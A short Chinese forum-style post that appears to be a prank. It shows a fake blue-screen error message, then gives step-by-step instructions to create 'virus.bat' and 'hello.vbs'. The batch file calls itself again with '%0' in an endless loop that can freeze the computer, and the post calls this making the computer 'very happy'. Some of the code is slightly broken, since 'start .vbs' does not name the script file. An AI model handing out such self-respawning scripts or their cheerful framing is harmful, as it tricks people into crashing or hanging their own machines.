奇妙的批处理脚本
2024-07-21 09:31:48
发布于:广东
// :(
// your computer has run in to a problem
// we only collect the error info, and restart for you.
// ERROR-Task-Failed
// scan the QR code to enter"trouble shoot"
正文:
在你的电脑上分别创建“virus.bat”和"hello.vbs";
然后确认根目录是一样的;
然后在hello.vbs里写入:
do
msgbox"something happend",36,"message"
exit do
loop
在virus.bat里写入:
start .vbs
%0
双击运行virus.bat,你的电脑会非常开心的 :)
这里空空如也
有帮助,赞一个